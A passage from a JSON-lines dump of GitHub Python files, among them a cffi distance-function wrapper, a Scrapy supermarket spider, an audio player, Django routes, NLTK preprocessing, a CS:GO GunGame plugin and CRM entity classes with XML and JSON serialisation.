subprocess\nimport os\nimport glob\n\nroot = os.path.dirname(os.path.dirname(__file__))\n\nlibs = glob.glob(root + \"/fast_sweeping_capi.*.so\")\n\nif len(libs) == 0:\n raise(OSError(\"fast_sweeping_capi.*.so library not found\"))\n\nif len(libs) > 1:\n raise(OSError((\"More than one candidate of fast_sweeping_capi.*.so library found: {}\").format(libs)))\n\nffi = cffi.FFI()\nlib = ffi.dlopen(libs[0])\n\nffi.cdef(\"\"\"\nvoid signed_distance_2d(double*, double*, size_t, size_t, double);\nvoid signed_distance_3d(double*, double*, size_t, size_t, size_t, double);\ndouble hausdorff_dist_2d(double*, double*, size_t, size_t, double);\ndouble l2_hausdorff_dist_2d(double*, double*, size_t, size_t, double);\ndouble hausdorff_dist_3d(double*, double*, size_t, size_t, size_t, double);\ndouble l2_hausdorff_dist_3d(double*, double*, size_t, size_t, size_t, double);\n\n\"\"\")\n\ndef verify_ffi_array(u, dtype):\n if u.dtype != dtype:\n raise TypeError('Array must be of type {}.'.format(dtype))\n if not u.flags.c_contiguous:\n raise TypeError('Array must be C contiguous.')\n if not u.flags.aligned:\n raise TypeError('Array must be properly aligned.')\n\ndef signed_distance(u, h, out = None):\n \"\"\"\n Computes the signed distance to the zero level set of the function `u`\n given on a regular grid with spacing `h`.\n\n You can use `out` to specify an array where to store the result.\n \"\"\"\n verify_ffi_array(u, np.dtype('float64'))\n\n if out is None:\n d = np.zeros_like(u, order='c')\n else:\n d = out\n\n verify_ffi_array(d, np.dtype('float64'))\n\n pd = ffi.cast(\"double *\", d.ctypes.data)\n pu = ffi.cast(\"double *\", u.ctypes.data)\n\n if len(u.shape) == 2:\n i, j = u.shape\n\n lib.signed_distance_2d(pd, pu, i, j, h)\n elif len(u.shape) == 3:\n i, j, k = u.shape\n lib.signed_distance_3d(pd, pu, i, j, k, h)\n else:\n raise TypeError(\"Array must be 2 or 3 dimensional.\")\n\n return d\n\ndef hausdorff_dist(u, v, h, l2=True):\n \"\"\" Returns the Hausdorff distance between two zero level sets.\n\n Returns +∞ if at least one of the level sets is empty.\"\"\"\n verify_ffi_array(u, np.dtype('float64'))\n verify_ffi_array(v, np.dtype('float64'))\n\n if u.shape != v.shape:\n raise TypeError(\"Arrays must have the same shape.\")\n\n pu = ffi.cast(\"double *\", u.ctypes.data)\n pv = ffi.cast(\"double *\", v.ctypes.data)\n\n if len(u.shape) == 2:\n i, j = u.shape\n\n if l2:\n return lib.l2_hausdorff_dist_2d(pu, pv, i, j, h)\n else:\n return lib.hausdorff_dist_2d(pu, pv, i, j, h)\n elif len(u.shape) == 3:\n i, j, k = u.shape\n\n if l2:\n return lib.l2_hausdorff_dist_3d(pu, pv, i, j, k, h)\n else:\n return lib.hausdorff_dist_3d(pu, pv, i, j, k, h)\n else:\n raise TypeError(\"Array must be 2 or 3 dimensional.\")\n","repo_name":"rekka/fast_sweeping","sub_path":"python/fast_sweeping/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2908,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"6"} +{"seq_id":"14999245083","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport urlparse\nfrom scrapy.loader import ItemLoader\nfrom scrapy_pv.items import ScrapyPvItem\nfrom scrapy.loader.processors import MapCompose\nimport socket\n\nclass BotWgSpider(scrapy.Spider):\n name = 'bot_wg'\n allowed_domains = ['wong.com.pe']\n #start_urls = ['https://www.wong.com.pe/FO/supermercados/index.go?search=2&caip=1']\n start_urls = ['https://www.wong.com.pe/FO/supermercados/index.go?search=2&caip=1']\n #https://www.wong.com.pe/FO/supermercados/productos.go?idCategoria=3962&idSubCategoria=4207\n #https://www.wong.com.pe/FO/fichas/index.go?idprod=143229&cat=4089\n\n def start_requests(self):\n # https://doc.scrapy.org/en/latest/topics/downloader-middleware.html#cookies-debug\n # Multiple cookie sessions per spider\n for i,url in enumerate(self.start_urls):\n yield scrapy.Request(url,\n self.parse,\n method='POST',\n meta={'cookiejar': i}\n )\n\n def parse(self, response):\n # Get item URLs and yield Requests\n meta = response.xpath('//li[@class=\"subcategoria\"]/a/@id')\n for m in meta:\n ids=m.extract().split(\"_\") # split the category from the subcategory\n url=\"https://www.wong.com.pe/FO/supermercados/productos.go?idCategoria=\"+ids[0]+\"&idSubCategoria=\"+ids[1]\n yield scrapy.Request(urlparse.urljoin(response.url, url),\n self.parse_lista,\n meta={'cookiejar': response.meta['cookiejar']}\n )\n\n def parse_lista(self, response):\n s_text = \" \".join(response.xpath('//div[@id=\"breadcrumbs\"]/text()').extract()[1].split())\n a_categ = s_text.split(\"/\")\n meta = response.xpath('//tbody/tr/@id')\n for m in meta:\n ids = m.extract().split(\"_\") # split to get the product code\n url=\"https://www.wong.com.pe/FO/fichas/index.go?idprod=\"+ids[1]\n yield scrapy.Request(urlparse.urljoin(response.url, url),\n self.parse_item,\n meta={'cookiejar': response.meta['cookiejar'],\n 'v_categoria':a_categ[0],\n 'v_subcategoria': a_categ[1],\n 'v_id': ids[1]\n }\n )\n\n def parse_item(self,response):\n default = ScrapyPvItem()\n default['principal'] = ['wong']\n default['categoria'] = [response.meta['v_categoria']]\n default['subcategoria'] = [response.meta['v_subcategoria']]\n default['tipo'] = ['']\n default['titulo'] = ['']\n default['brand'] = ['']\n default['codigo_producto'] = [response.meta['v_id']]\n default['imagen'] = ['']\n default['estrellas'] = ['']\n default['especificacion'] = ['']\n default['mejor_precio'] = ['']\n default['precio_normal'] = ['']\n default['unidad'] = ['']\n default['promocion'] = ['']\n default['url'] = ['']\n default['project'] = ['']\n default['spider'] = ['']\n default['server'] = ['']\n\n l = ItemLoader(item=default, response=response)\n\n l.add_xpath('tipo', '//*[@id=\"f_productos_0\"]/span[1]/text()',\n MapCompose(unicode.strip, unicode.title))\n l.add_xpath('titulo', '//*[@id=\"f_productos_0\"]/span[3]/text()',\n MapCompose(unicode.strip, unicode.title))\n l.add_xpath('brand', '//*[@id=\"f_productos_0\"]/span[2]/text()',\n MapCompose(unicode.strip, unicode.title))\n l.add_xpath('imagen', '//*[@id=\"foto\"]/img/@src',\n MapCompose(unicode.strip, unicode.title))\n l.add_xpath('mejor_precio', '//*[@id=\"f_productos_0\"]/span[4]/text()',\n MapCompose(unicode.strip, unicode.title))\n l.add_xpath('precio_normal', '//*[@id=\"f_productos_0\"]/span[3]/span/text()',\n MapCompose(unicode.strip, unicode.title))\n\n l.add_value('url', response.url)\n l.add_value('project', self.settings.get('BOT_NAME'))\n l.add_value('spider', self.name)\n l.add_value('server', socket.gethostname())\n\n return l.load_item()\n","repo_name":"joenvihe/ejemplos_scrapy","sub_path":"scrapy_pv/scrapy_pv/spiders/bot_wg.py","file_name":"bot_wg.py","file_ext":"py","file_size_in_byte":4566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"22935536050","text":"\n\nimport subprocess\nimport types\nimport wave\n\n\ndef play(data, rate=16000, channels=1, width=2):\n \"\"\"\n play raw audio (string or generator)\n Args:\n data: 
raw audio data, str or iterator\n rate: sample rate, only for raw audio\n channels: channel number, only for raw data\n width: raw audio data width, 16 bit is 2, only for raw data\n \"\"\"\n format_list = (None, 'S8', 'S16_LE', 'S24_LE', 'S32_LE')\n command = 'aplay -c {} -r {} -f {} -'.format(channels, rate, format_list[width])\n \n p = subprocess.Popen(command, stdin=subprocess.PIPE, shell=True)\n p.stdin.write(b'\\0' * 2 * 16000)\n if isinstance(data, types.GeneratorType):\n for d in data:\n print(len(d))\n p.stdin.write(d)\n else:\n p.stdin.write(data)\n\n p.stdin.write(b'\\0' * 2 * 16000)\n p.stdin.close()\n p.wait()\n\n\ndef play_wav(wav):\n f = wave.open(wav, 'rb')\n rate = f.getframerate()\n channels = f.getnchannels()\n width = f.getsampwidth()\n\n def gen(w):\n d = w.readframes(1024)\n while d:\n yield d\n d = w.readframes(1024)\n w.close()\n\n data = gen(f)\n\n play(data, rate, channels, width)\n\n\n\ndef main():\n import sys\n\n if len(sys.argv) < 2:\n print('Usage: python {} music.wav'.format(sys.argv[0]))\n sys.exit(1)\n\n play_wav(sys.argv[1])\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"voice-engine/wenwen","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"6"} +{"seq_id":"23480669822","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('', views.index, name='Qc_index'),\n path('proj/', views.project, name='Pj_list'),\n path('proj//', views.proj_detail, name='Pj_detail'),\n path('slfchkstanin//', views.slfchkstandin_detail, name='SlfChkStandIn_detail'),\n path('category//', views.cate_detail, name='Cate_detail'),\n path('category/', views.category, name='Cate_list'),\n path('category/workslist/', views.works, name='Work_list'),\n path('catecory/workslist/arrange/', views.arng, name='Arng_list'),\n path('catecory/workslist/arrange/add/', views.arng_add, name='Arng_add'),\n]","repo_name":"edward79519/qcsystem","sub_path":"qcmanager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"40785138611","text":"\"\"\"\nThis module contains some functions to preprocess text before passing it to\neach of our models.\n\nText Pre-processing\n-------------------\n\"\"\"\n\nfrom nltk.corpus import stopwords \nfrom nltk.tokenize import word_tokenize \nfrom nltk.stem import WordNetLemmatizer \n\n\ndef rem_stopwords_tokenize(data): \n \"\"\"\n This function removes stopwords from a given sentence.\n\n Args:\n data (:obj: `list`): Sentence, list of words.\n Returns:\n list: Sentence without stopwords.\n \"\"\"\n stop_words = set(stopwords.words('english')) \n x=[]\n for i in data:\n word_tokens = word_tokenize(i) \n x.append([w for w in word_tokens if not w in stop_words])\n \n return x\n\n\ndef lemmatize_all(data):\n \"\"\"\n This function removes the 'lemma' from every word in a sentence.\n\n Args:\n data (:obj: `list`): Sentence, list of words.\n Returns:\n list: Sentence with words without their lemma.\n \"\"\"\n lemmatizer = WordNetLemmatizer() \n a=[]\n for i in data:\n a.append([lemmatizer.lemmatize(j) for j in i])\n return a\n\n\ndef convert_to_string(data):\n \"\"\"\n This function converts a sentence in the form of a list of words into a\n sentence in the form of a text string.\n\n Args:\n data (:obj: `list`): Sentence, list of words.\n Returns:\n str: Sentence, text string\n \"\"\"\n p=[]\n for i in data:\n # Important: remove commas \n l = list(filter(lambda a: a != ',', i))\n listToStr = ' '.join(map(str, l))\n p.append(listToStr)\n return p\n","repo_name":"ericmrls/Backend-TFG","sub_path":"src/classic_model/text_preprocessing.py","file_name":"text_preprocessing.py","file_ext":"py","file_size_in_byte":1549,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"19011945051","text":"from typing import List\nimport cv2\nimport os\nimport numpy as np\nimport imgaug.augmenters as iaa\nfrom random import randrange\n\ndef loadFrames(folder):\n images = []\n for filename in os.listdir(folder):\n img = cv2.imread(os.path.join(folder,filename))\n if img is not None:\n images.append(img)\n return images\n\nseq = iaa.Sequential([\n \n iaa.GaussianBlur(sigma=(0, 3.0))\n \n])\n\ndef writeImages(imLists):\n\n for listNum, list in enumerate(imLists):\n for imNum, image in enumerate(list):\n cv2.imwrite('./data/augmented/scene{:05d}_{}.PNG'.format(listNum, imNum), image)\n \n return\n\ndef main():\n \n images = loadFrames('/home/topnotces/frames')\n ListOfImages = [ [] for _ in range(len(images)) ]\n\n for _ in range(10):\n imAug = seq(images=images) \n for j, im in enumerate(imAug):\n print(j)\n ListOfImages[j].append(im)\n\n writeImages(ListOfImages)\n\n \n\n\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"topnotches/Bachelors_Project","sub_path":"YoloV3/cock.py","file_name":"cock.py","file_ext":"py","file_size_in_byte":1008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"39269783595","text":"\n\nimport logging\nimport re\nimport subprocess\nimport time\nfrom contextlib import contextmanager\n\nfrom flask_sqlalchemy import get_debug_queries\nfrom sqlalchemy.orm import class_mapper, defer\n\n\n_MAX_LENGTH = 300\n\n\ndef safe_repr(obj, short=True):\n try:\n result = repr(obj)\n except Exception:\n result = object.__repr__(obj)\n if not short or len(result) < _MAX_LENGTH:\n return result\n return result[:_MAX_LENGTH] + ' [truncated]...'\n\n\n@contextmanager\ndef timing(label):\n start = time.time()\n yield\n print(('Time for %s: %.3f' % (label, time.time() - start)))\n\n\ndef defer_except(entity, cols, path=()):\n m = class_mapper(entity)\n defer_columns = set(p.key for p\n in m.iterate_properties\n if hasattr(p, 'columns')).difference(cols)\n return [defer(*(list(path) + [k])) for k in defer_columns]\n\n\n@contextmanager\ndef print_queries():\n start_len = len(get_debug_queries())\n try:\n yield\n finally:\n for q in get_debug_queries()[start_len:]:\n try:\n print((\">>> %.3f\" % q.duration, q.statement % tuple(repr(p) for p in q.parameters)))\n except:\n print((q.statement, q.parameters))\n print()\n print((len(get_debug_queries()) - start_len, \"queries\"))\n\n\ndef printquery(statement, bind=None):\n \"\"\"\n print a query, with values filled in\n for debugging purposes *only*\n for security, you should always separate queries from their values\n please also note that this function is quite slow\n \"\"\"\n import sqlalchemy.orm\n if isinstance(statement, sqlalchemy.orm.Query):\n if bind is None:\n bind = statement.session.get_bind(statement._mapper_zero_or_none())\n statement = statement.statement\n elif bind is None:\n bind = statement.bind\n\n dialect = bind.dialect\n compiler = statement._compiler(dialect)\n\n class LiteralCompiler(compiler.__class__):\n def visit_bindparam(\n self, bindparam, within_columns_clause=False,\n literal_binds=False, **kwargs):\n 
return super(LiteralCompiler, self).render_literal_bindparam(\n bindparam,\n within_columns_clause=within_columns_clause,\n literal_binds=literal_binds, **kwargs)\n\n compiler = LiteralCompiler(dialect, statement)\n print((compiler.process(statement)))\n\n\ndef make_fqdn(target, zone_name):\n if target.endswith('.'):\n return target\n elif target == '@':\n return zone_name + '.'\n else:\n if zone_name != '':\n return target + '.' + zone_name + '.'\n return target + '.'\n\n\ndef email2fqdn(string):\n name, host = string.split('@')\n return '%s.%s.' % (name.replace('.', '\\\\.'), host)\n\n\ndef fqdn2email(string):\n name, host = re.split(r'(? Illust:\n site_url = match.group(1)\n post_id = match.group(2)\n db = Database().driver()\n collection = db.collection(COLLECTIONS[site_url])\n api = Moebooru().site(site_url)\n\n illust = await api.view(post_id)\n illust.metadata[\"collected_at\"] = time()\n await collection.insert(int(post_id), illust.metadata)\n return illust\n","repo_name":"y-young/nazurin","sub_path":"nazurin/sites/moebooru/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":239,"dataset":"github-code","pt":"6"} +{"seq_id":"21842658884","text":"# ../gungame/games/csgo.py\n\n\"\"\"CS:GO changes.\"\"\"\n\n# =============================================================================\n# >> IMPORTS\n# =============================================================================\n# Python\nfrom warnings import warn\n\n# Source.Python\nfrom core import GAME_NAME\nfrom events import Event\nfrom weapons.manager import weapon_manager\n\n# GunGame\nfrom gungame.core.config.misc import allow_kills_after_round, level_on_protect\nfrom gungame.core.messages.manager import message_manager\nfrom gungame.core.players.dictionary import player_dictionary\nfrom gungame.core.players.instance import GunGamePlayer\nfrom gungame.core.status import (\n GunGameMatchStatus, GunGameRoundStatus, GunGameStatus,\n)\nfrom gungame.core.weapons.groups import incendiary_weapons, individual_weapons\n\n\n# =============================================================================\n# >> OVERRIDES\n# =============================================================================\nindividual_weapons.add('taser')\n\n\nclass _NoMessage:\n \"\"\"Class used to hook non-supported message types.\"\"\"\n\n def __init__(self, message_type):\n \"\"\"Store the message type.\"\"\"\n self.message_type = message_type\n\n def message_hook(self, *args, **kwargs):\n \"\"\"Override for messages that do not work.\"\"\"\n warn(\n f'Message type \"{self.message_type}\" not supported for '\n f'game \"{GAME_NAME}\".'\n )\n\n\n# CS:GO doesn't support any Dialog menus/messages\nmessage_manager.top_message = _NoMessage('DialogMsg').message_hook\n# CS:GO Center and KeyHint message are in same location as HintText\nmessage_manager.center_message = message_manager.hint_message\nmessage_manager.keyhint_message = message_manager.hint_message\n\n\n@Event('player_death')\ndef _player_death(game_event):\n \"\"\"Award the killer with a multi-kill increase or level increase.\"\"\"\n # Is GunGame active?\n if GunGameStatus.MATCH is not GunGameMatchStatus.ACTIVE:\n return\n\n # Is the round active or should kills after the round count?\n if (\n GunGameStatus.ROUND is GunGameRoundStatus.INACTIVE and\n not allow_kills_after_round.get_int()\n ):\n return\n\n # Get the victim\n userid = game_event['userid']\n\n # Get the attacker\n attacker = game_event['attacker']\n\n 
# Was this a suicide?\n    if attacker in (userid, 0):\n        return\n\n    # Get the victim's instance\n    victim = player_dictionary[userid]\n\n    # Get the attacker's instance\n    killer = player_dictionary[attacker]\n\n    # Was this a team-kill?\n    if victim.team_index == killer.team_index:\n        return\n\n    if killer.in_spawn_protection and not level_on_protect.get_int():\n        return\n\n    # Did the killer kill using their level's weapon?\n    try:\n        weapon = weapon_manager[game_event['weapon']].basename\n    except KeyError:\n        return\n\n    # A molotov kill counts for whichever incendiary weapon the level uses.\n    if weapon == 'molotov' and killer.level_weapon in incendiary_weapons:\n        weapon = killer.level_weapon\n\n    if weapon_manager[weapon].basename != killer.level_weapon:\n        return\n\n    # Increase the killer's multi_kill\n    killer.multi_kill += 1\n\n    # Does the player need leveled up?\n    if killer.multi_kill < killer.level_multi_kill:\n\n        # If not, no need to go further\n        return\n\n    # Level the player up\n    killer.increase_level(\n        levels=1,\n        reason='kill',\n        victim=userid,\n    )\n\n\ndef _give_level_weapon(player):\n    \"\"\"Hooks give_level_weapon to ensure that the proper weapon is given.\"\"\"\n    weapon = _old_give_level_weapon(player)\n    if weapon.classname == weapon.weapon_name:\n        return weapon\n    weapon.remove()\n    # Swap to the opposite team (CS:GO team indexes are 2 and 3, so\n    # 5 - index flips them), grab that team's weapon variant, then swap back.\n    player.team_index = 5 - player.team_index\n    weapon = _old_give_level_weapon(player)\n    player.team_index = 5 - player.team_index\n    return weapon\n\n\n_old_give_level_weapon = GunGamePlayer.give_level_weapon\nGunGamePlayer.give_level_weapon = _give_level_weapon\n","repo_name":"GunGame-Dev-Team/GunGame-SP","sub_path":"addons/source-python/plugins/gungame/games/csgo.py","file_name":"csgo.py","file_ext":"py","file_size_in_byte":3931,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"6"}
+{"seq_id":"9312238182","text":"class Solution:\n    def maxSubArray(self, nums):\n        \"\"\"\n        :type nums: List[int]\n        :rtype: int\n        \"\"\"\n        \"\"\"\n        Complexity: O(n)\n        Space: O(n)\n        let dp[i] be the maximum subarray ending at the ith index.\n\n        If we use Divide and Conquer the complexity becomes O(n log n):\n        log n levels of recursion, with O(n) work per level to find the\n        maximum subarray crossing the left and right halves.\n\n        \"\"\"\n        dp = [0]*len(nums)\n        dp[0] = nums[0]\n        max_value = dp[0]\n        for i in range(1, len(nums)):\n            dp[i] = dp[i-1] + nums[i] if dp[i-1] > 0 else nums[i]\n            max_value = max(max_value, dp[i])\n\n        return max_value\n","repo_name":"acnokego/LeetCode","sub_path":"053_maximum_subarray/dp.py","file_name":"dp.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
+{"seq_id":"33003818644","text":"#!/usr/bin/env python3\n\nfrom PIL import Image\nimport numpy as np\nimport os\nimport random\nimport copy\n\nnew_size = (256, 144)\n\ndef prepareImages(root_dir = None):\n\n    training_images = []\n    testing_images = []\n    training_labels = []\n    testing_labels = []\n    if root_dir is None:\n        root_dir = os.path.realpath(\".\")\n    for root, dirs, files_t in os.walk(root_dir):\n        for d in dirs:\n            if d == \"data\":\n                t_dir = os.path.join(root_dir, d)\n                for subroot, subdirs, files_t in os.walk(t_dir):\n                    for d_2 in subdirs:\n                        l_dir = os.path.join(t_dir, d_2)\n                        for subsubroot, dirs_2, files in os.walk(l_dir):\n                            for f in files:\n                                training_string = os.path.join(l_dir, f)\n                                with Image.open(training_string) as h:\n                                    h_2 = h.resize(new_size)\n                                training_images.append(np.array(h_2))\n                                if d_2 == \"Snake\":\n                                    training_labels.append(0)\n                                else:\n                                    training_labels.append(1)\n\n    temp_indices = [x for x in range(len(training_images))]\n    removal_indices = []\n    while len(removal_indices) < ((5 * len(training_images)) / 6):\n        removal_indices.append(temp_indices.pop(random.randint(0, len(temp_indices) - 1)))\n\n    removal_indices.sort(reverse=True)\n    for i in removal_indices:\n        testing_images.append(copy.deepcopy(training_images[i]))\n        testing_labels.append(copy.copy(training_labels[i]))\n        del training_images[i]\n        del training_labels[i]\n\n    training_images = np.asarray(training_images)\n    training_labels = np.asarray(training_labels)\n    testing_images = np.asarray(testing_images)\n    testing_labels = np.asarray(testing_labels)\n\n    return (training_images, training_labels), (testing_images, testing_labels)\n\ndef testImages(root_dir):\n    pictures = []\n    names = []\n    for root, dirs, files in os.walk(root_dir):\n        # Walk every file reported under root_dir.\n        for f in files:\n            temp = os.path.join(root, f)\n            with Image.open(temp) as h:\n                h_2 = h.resize(new_size)\n            h_2 = np.asarray(h_2)\n            h_2 = h_2 / 255.0\n            pictures.append(h_2)\n            names.append(temp.split(\"/\")[-1])\n            print(names[-1])\n\n    print(\"Done with Prep Phase.\")\n\n    return np.asarray(pictures), names\n","repo_name":"ClarkHensley/SnakeClassifier","sub_path":"Prep_Image.py","file_name":"Prep_Image.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"}
+{"seq_id":"73561662909","text":"# -*- coding: utf-8 -*-\n\"\"\"CRM entity classes\n\n.. module:: testenv.entities.crm_entities\n    :platform: Unix\n    :synopsis: CRM entity classes\n.. moduleauthor:: Petr Rašek\n\n\"\"\"\n\nfrom lxml.etree import Element, SubElement\nfrom simplejson import dumps\n\n\nclass Customer(object):\n    \"\"\"Class Customer\n    \"\"\"\n\n    def __init__(self, id, name, status, segment, birth_no=None, reg_no=None, tax_no=None):\n        \"\"\"Class constructor\n\n        Customer entity\n\n        Args:\n            id (int): customer id\n            name (str): name\n            status (str): status, active|deactive|suspend\n            segment (int): segment id, 2|3|4|5 RES|VSE|SME|LE\n            birth_no (str): birth number\n            reg_no (str): registration number\n            tax_no (str): tax identification number\n\n        \"\"\"\n\n        self.id = id\n        self.name = name\n        self.status = status\n        self.segment = segment\n        self.birth_no = birth_no\n        self.reg_no = reg_no\n        self.tax_no = tax_no\n\n    def __str__(self):\n        \"\"\"Method overrides __str__\n        \"\"\"\n\n        s = u'id:{0}|name:{1}|status:{2}|segment:{3}'.format(self.id, self.name, self.status, self.segment) + \\\n            u'|birth_no:{0}|reg_no:{1}|tax_no:{2}'.format(\n                self.birth_no, self.reg_no, self.tax_no)\n        return s\n\n    def toxml(self):\n        \"\"\"Method serializes customer to XML\n        \"\"\"\n\n        root = Element('customer')\n\n        SubElement(root, 'id').text = str(self.id)\n        SubElement(root, 'name').text = self.name\n        SubElement(root, 'status').text = self.status\n        SubElement(root, 'segment').text = str(self.segment)\n        if (self.birth_no != None):\n            SubElement(root, 'birth_no').text = self.birth_no\n        if (self.reg_no != None):\n            SubElement(root, 'reg_no').text = self.reg_no\n        if (self.tax_no != None):\n            SubElement(root, 'tax_no').text = self.tax_no\n\n        return root\n\n    def tojson(self):\n        \"\"\"Method serializes customer to JSON\n        \"\"\"\n\n        root = {}\n\n        root['id'] = self.id\n        root['name'] = self.name\n        root['status'] = self.status\n        root['segment'] = self.segment\n        if (self.birth_no != None):\n            root['birth_no'] = self.birth_no\n        if (self.reg_no != None):\n            root['reg_no'] = self.reg_no\n        if (self.tax_no != None):\n            root['tax_no'] = self.tax_no\n\n        return dumps(root)\n\n\nclass Payer(object):\n    \"\"\"Class 
Payer\n \"\"\"\n\n def __init__(self, id, name, status, billcycle, customer, bank_account=None):\n \"\"\"Class constructor\n\n Payer entity \n\n Args:\n id (int): payer id\n name (str): name\n status (str): status, active|deactive|suspend\n billcycle (int): billcycle id, 1|2|3|4 51|52|53|54 \n bank_account (str): banking account\n customer (id): assigned customer id \n\n \"\"\"\n\n self.id = id\n self.name = name\n self.status = status\n self.billcycle = billcycle\n self.bank_account = bank_account\n self.customer = customer\n\n def __str__(self):\n \"\"\"Method overrides __str__ \n \"\"\"\n\n s = u'id:{0}|name:{1}|status:{2}|billcycle:{3}'.format(self.id, self.name, self.status, self.billcycle) + \\\n u'|bank_account:{0}|customer:{1}'.format(\n self.bank_account, self.customer)\n return s\n\n def toxml(self):\n \"\"\"Method serializes payer to XML \n \"\"\"\n\n root = Element('payer')\n\n SubElement(root, 'id').text = str(self.id)\n SubElement(root, 'name').text = self.name\n SubElement(root, 'status').text = self.status\n SubElement(root, 'billcycle').text = str(self.billcycle)\n if (self.bank_account != None):\n SubElement(root, 'bank_account').text = self.bank_account\n SubElement(root, 'customer').text = str(self.customer)\n\n return root\n\n def tojson(self):\n \"\"\"Method serializes payer to JSON \n \"\"\"\n\n root = {}\n\n root['id'] = self.id\n root['name'] = self.name\n root['status'] = self.status\n root['billcycle'] = self.billcycle\n if (self.bank_account != None):\n root['bank_account'] = self.bank_account\n root['customer'] = self.customer\n\n return dumps(root)\n\n\nclass Subscriber(object):\n \"\"\"Class Subscriber\n \"\"\"\n\n def __init__(self, id, name, msisdn, status, market, tariff, customer, payer):\n \"\"\"Class constructor\n\n Subscriber entity \n\n Args:\n id (int): subscriber id \n name (str): name\n msisdn (str): MSISDN\n status (str): status, active|deactive|suspend\n market (int): market id, 1|2|3 GSM|DSL|FIX\n tariff (int): tariff id, 433|459|434|460\n customer (int): assigned customer id \n payer (int): assigned payer id \n\n \"\"\"\n\n self.id = id\n self.name = name\n self.msisdn = msisdn\n self.status = status\n self.market = market\n self.tariff = tariff\n self.customer = customer\n self.payer = payer\n\n def __str__(self):\n \"\"\"Method overrides __str__ \n \"\"\"\n\n s = u'id:{0}|name:{1}|msisdn:{2}|status:{3}'.format(self.id, self.name, self.msisdn, self.status) + \\\n u'|market:{0}|tariff:{1}|customer:{2}|payer:{3}'.format(\n self.market, self.tariff, self.customer, self.payer)\n return s\n\n def toxml(self):\n \"\"\"Method serializes subscriber to XML \n \"\"\"\n\n root = Element('subscriber')\n\n SubElement(root, 'id').text = str(self.id)\n SubElement(root, 'name').text = self.name\n SubElement(root, 'msisdn').text = self.msisdn\n SubElement(root, 'status').text = self.status\n SubElement(root, 'market').text = str(self.market)\n SubElement(root, 'tariff').text = str(self.tariff)\n SubElement(root, 'customer').text = str(self.customer)\n SubElement(root, 'payer').text = str(self.payer)\n\n return root\n\n def tojson(self):\n \"\"\"Method serializes subscriber to JSON \n \"\"\"\n\n root = {}\n\n root['id'] = self.id\n root['name'] = self.name\n root['msisdn'] = self.msisdn\n root['status'] = self.status\n root['market'] = self.market\n root['tariff'] = self.tariff\n root['customer'] = self.customer\n root['payer'] = self.payer\n\n return dumps(root)\n\n\nclass Contact(object):\n \"\"\"Class Contact\n \"\"\"\n\n def __init__(self, id, name, 
phone=None, email=None, roles=[]):\n \"\"\"Class constructor\n\n Contact entity \n\n Args:\n id (int): contact id \n name (str): name \n phone (str): phone number\n email (str): email\n roles (list): contact roles \n\n \"\"\"\n\n self.id = id\n self.name = name\n self.phone = phone\n self.email = email\n self.roles = roles\n\n def __str__(self):\n \"\"\"Method overrides __str__ \n \"\"\"\n\n s = u'id:{0}|name:{1}|phone:{2}|email:{3}|roles#'.format(\n self.id, self.name, self.phone, self.email)\n\n if (len(self.roles) > 0):\n\n for role in self.roles:\n s += '{0}#'.format(role)\n\n return s\n\n def toxml(self):\n \"\"\"Method serializes contact to XML \n \"\"\"\n\n root = Element('contact')\n\n SubElement(root, 'id').text = str(self.id)\n SubElement(root, 'name').text = self.name\n if (self.phone != None):\n SubElement(root, 'phone').text = self.phone\n if (self.email != None):\n SubElement(root, 'email').text = self.email\n\n if (len(self.roles) > 0):\n elem = SubElement(root, 'roles')\n\n for role in self.roles:\n elem.append(role.toxml())\n\n return root\n\n def tojson(self):\n \"\"\"Method serializes contact to JSON \n \"\"\"\n\n root = {}\n\n root['id'] = self.id\n root['name'] = self.name\n if (self.phone != None):\n root['phone'] = self.phone\n if (self.email != None):\n root['email'] = self.email\n\n if (len(self.roles) > 0):\n el_roles = []\n\n for role in self.roles:\n el_role = {'id': role.id, 'title': role.title,\n 'customer': role.customer, 'payer': role.payer,\n 'subscriber': role.subscriber}\n el_roles.append(el_role)\n\n root['roles'] = {'role': el_roles}\n\n return dumps(root)\n\n\nclass ContactRole(object):\n \"\"\"Class ContactRole\n \"\"\"\n\n def __init__(self, id, title, customer=None, payer=None, subscriber=None):\n \"\"\"Class constructor\n\n Contact role entity \n\n Args:\n id (int): contact id \n title (str): role title, contract|contact|invoicing\n customer (int): assigned customer id\n payer (int): assigned payer id\n subscriber (int): assigned subscriber id \n\n \"\"\"\n\n self.id = id\n self.title = title\n self.customer = customer\n self.payer = payer\n self.subscriber = subscriber\n\n def __str__(self):\n \"\"\"Method overrides __str__ \n \"\"\"\n\n s = u'id:{0}|title:{1}|customer:{2}|payer:{3}'.format(self.id, self.title, self.customer, self.payer) + \\\n u'|subscriber:{0}'.format(self.subscriber)\n return s\n\n def toxml(self):\n \"\"\"Method serializes contact role to XML \n \"\"\"\n\n root = Element('role')\n\n SubElement(root, 'id').text = str(self.id)\n SubElement(root, 'title').text = self.title\n if (self.customer != None):\n SubElement(root, 'customer').text = str(self.customer)\n if (self.payer != None):\n SubElement(root, 'payer').text = str(self.payer)\n if (self.subscriber != None):\n SubElement(root, 'subscriber').text = str(self.subscriber)\n\n return root\n\n def tojson(self):\n \"\"\"Method serializes contact role to JSON \n 